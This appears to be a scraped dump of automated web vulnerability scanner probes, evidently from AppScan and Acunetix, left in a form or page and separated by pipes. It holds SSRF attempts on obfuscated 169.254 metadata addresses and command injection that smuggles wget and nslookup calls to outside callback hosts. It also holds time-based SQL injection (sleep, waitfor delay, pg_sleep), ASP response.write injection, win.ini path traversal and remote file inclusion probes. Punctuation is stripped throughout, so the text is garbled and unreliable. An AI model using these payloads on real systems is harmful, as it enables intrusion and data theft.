http0x00A9.0x0000FE.0x04F.0x000004618036AppScanMsg.htmlvarId=5277
|
123426wget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5278
|
http0xA9FE4F4618036AppScanMsg.htmlvarId=5281
|
http000251.000000376.00000117.000010618036AppScanMsg.htmlvarId=5284
|
http000002517744750618036AppScanMsg.htmlvarId=5287
|
123460wget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D528960
|
12342626wget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5291
|
12347C7Cwget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5294
|
1234$wget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5299
|
http0xA9.254.0000000117.0x0004618036AppScanMsg.htmlvarId=5301
|
http714698323818036AppScanMsg.htmlvarId=5305
|
12345C22wget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D530723
|
1234wget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D530923
|
12343Ewget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5312
|
12343Cwget20http3A2F2F169.254.79.703A180362FAppScanMsg.html3FvarId3D5319
|
1234 AppScanHeader AppScanValue1.2-5330 SecondAppScanHeader whatever
|
response.write9636677*9638594
|
response.write9636677*9638594
|
response.write9636677*9638594
|
-1 OR 2423-423-1=0001 or WKr9BK0e=
|
0XORifnow=sysdate,sleep13,0XORZ
|
0XORifnow=sysdate,sleep13,0XORZ
|
0XORifnow=sysdate,sleep9,0XORZ
|
select0fromselectsleep13v*select0fromselectsleep13vselect0fromselectsleep13v*
|
YfJUHuoR waitfor delay 004
|
yzOUSXbn waitfor delay 004
|
m5MxRqXP waitfor delay 0013
|
GuvtzMKd waitfor delay 004
|
xR7o6JwG waitfor delay 0013
|
nslookup hitwc9A9wJHiq25ebb.bxss.me
|
$nslookup hitDZnexDG1A8cf5e6.bxss.me
|
nslookup hitVjxtrvammy80602.bxss.me\`0nslookup hitVjxtrvammy80602.bxss.me`
|
|nslookup hit1xadlH3zsZ56503.bxss.me
|
`nslookup hitfla2uJ9ppi3f001.bxss.me`
|
nslookup hit7cysc2lvQHb07c1.bxss.me|nslookup hit7cysc2lvQHb07c1.bxss.menslookup hit7cysc2lvQHb07c1.bxss.me
|
....................windowswin.ini
|
httpsome-inexistent-website.acusome_inexistent_file_with_long_name.jpg
|
1some_inexistent_file_with_long_name.jpg
|
httphitIFBygnl1tm.bxss.me
|
response.write9915486*9527706
|
response.write9915486*9527706
|
response.write9915486*9527706
|
....................windowswin.ini
|
nslookup hit1piPR8K1hE03a10.bxss.me
|
$nslookup hitbZptPSfKL833376.bxss.me
|
nslookup hitTZkcIY9la74581d.bxss.me\`0nslookup hitTZkcIY9la74581d.bxss.me`
|
|nslookup hitPbqhArXAIV944c6.bxss.me
|
`nslookup hitC66BHhoa9Nbc4c2.bxss.me`
|
nslookup hit9r3T7HhwFU672d2.bxss.me|nslookup hit9r3T7HhwFU672d2.bxss.menslookup hit9r3T7HhwFU672d2.bxss.me
|
httpsome-inexistent-website.acusome_inexistent_file_with_long_name.jpg
|
1some_inexistent_file_with_long_name.jpg
|
httphitrE93kuDaNS.bxss.me
|
-1 OR 2418-418-1=0001 or dDq5B7ma=
|
0XORifnow=sysdate,sleep16,0XORZ
|
0XORifnow=sysdate,sleep5,0XORZ
|
select0fromselectsleep5v*select0fromselectsleep5vselect0fromselectsleep5v*
|
OSqfkuol waitfor delay 0011
|
kfn5XUoz waitfor delay 0011
|
Camt4iT2 waitfor delay 0011
|
xAiGJFm6select pg_sleep16
|
IKXbMEmQselect pg_sleep16
|
vnIwdtYzselect pg_sleep16
|
response.write9674146*9751847
|
response.write9674146*9751847
|
response.write9674146*9751847
|
....................windowswin.ini
|
nslookup hitUcXCW0V2TF4075c.bxss.me
|
$nslookup hitvJiGz7lRYU12d48.bxss.me
|
nslookup hit7SL7gBJ0g72eb22.bxss.me\`0nslookup hit7SL7gBJ0g72eb22.bxss.me`
|
|nslookup hittb9JJwsPz080a51.bxss.me
|
`nslookup hitSm6uZG5EDbe326f.bxss.me`
|
httpsome-inexistent-website.acusome_inexistent_file_with_long_name.jpg
|
1some_inexistent_file_with_long_name.jpg
|
nslookup hitv5Jl4Wc8BC48d83.bxss.me|nslookup hitv5Jl4Wc8BC48d83.bxss.menslookup hitv5Jl4Wc8BC48d83.bxss.me
|
httphitTUQ9344Eou.bxss.me
|
-1 OR 2685-685-1=0001 or cAqfpxtF=
|
0XORifnow=sysdate,sleep9,0XORZ
|
0XORifnow=sysdate,sleep9,0XORZ
|
select0fromselectsleep9v*select0fromselectsleep9vselect0fromselectsleep9v*
|
GWGaa009 waitfor delay 006
|
BrGB0nA6 waitfor delay 009
|
jqqLwAZp waitfor delay 009
|
response.write9482298*9396786
|
response.write9482298*9396786
|
response.write9482298*9396786
|
nslookup hitbzgjJNeDHSce8b0.bxss.me
|
$nslookup hitPqoBClO6Lw9355c.bxss.me
|
nslookup hitYfET733pnNdcf5f.bxss.me\`0nslookup hitYfET733pnNdcf5f.bxss.me`
|
|nslookup hitxVCKzMbuhd56c27.bxss.me
|
`nslookup hitOVAQsG9CqKd54d7.bxss.me`
|
nslookup hit7BEZQopnRkfde36.bxss.me|nslookup hit7BEZQopnRkfde36.bxss.menslookup hit7BEZQopnRkfde36.bxss.me
|
....................windowswin.ini
|
-1 OR 2496-496-1=0001 or q43qP6fg=
|
httpsome-inexistent-website.acusome_inexistent_file_with_long_name.jpg
|
1some_inexistent_file_with_long_name.jpg
|
httphithZmlinETob.bxss.me
|
response.write9220460*9410844
|
response.write9220460*9410844
|
response.write9220460*9410844
|
nslookup hitGl7ESwsvec1e919.bxss.me
|
$nslookup hitwa93AehwQPb17e8.bxss.me
|
....................windowswin.ini
|
nslookup hitsc3X2XsEsW59157.bxss.me\`0nslookup hitsc3X2XsEsW59157.bxss.me`
|
|nslookup hitv4L9xffzXle96cb.bxss.me
|
`nslookup hitC2Axiw0zd068255.bxss.me`
|
nslookup hitjhSYCMmxfq1b91a.bxss.me|nslookup hitjhSYCMmxfq1b91a.bxss.menslookup hitjhSYCMmxfq1b91a.bxss.me
|
httpsome-inexistent-website.acusome_inexistent_file_with_long_name.jpg
|
1some_inexistent_file_with_long_name.jpg
|
httphitUHiR70OnNH.bxss.me
|
-1 OR 2386-386-1=0001 or 6ubuPSrR=
|
0XORifnow=sysdate,sleep3,0XORZ
|
0XORifnow=sysdate,sleep3,0XORZ
|
select0fromselectsleep6v*select0fromselectsleep6vselect0fromselectsleep6v*
|
IDPW282E waitfor delay 009
|
3ZoHTfW7 waitfor delay 003
|
8Yk8jSeF waitfor delay 003
|
IynKHbGT waitfor delay 009
|
response.write9867437*9919945
|
response.write9867437*9919945
|
response.write9867437*9919945
|
|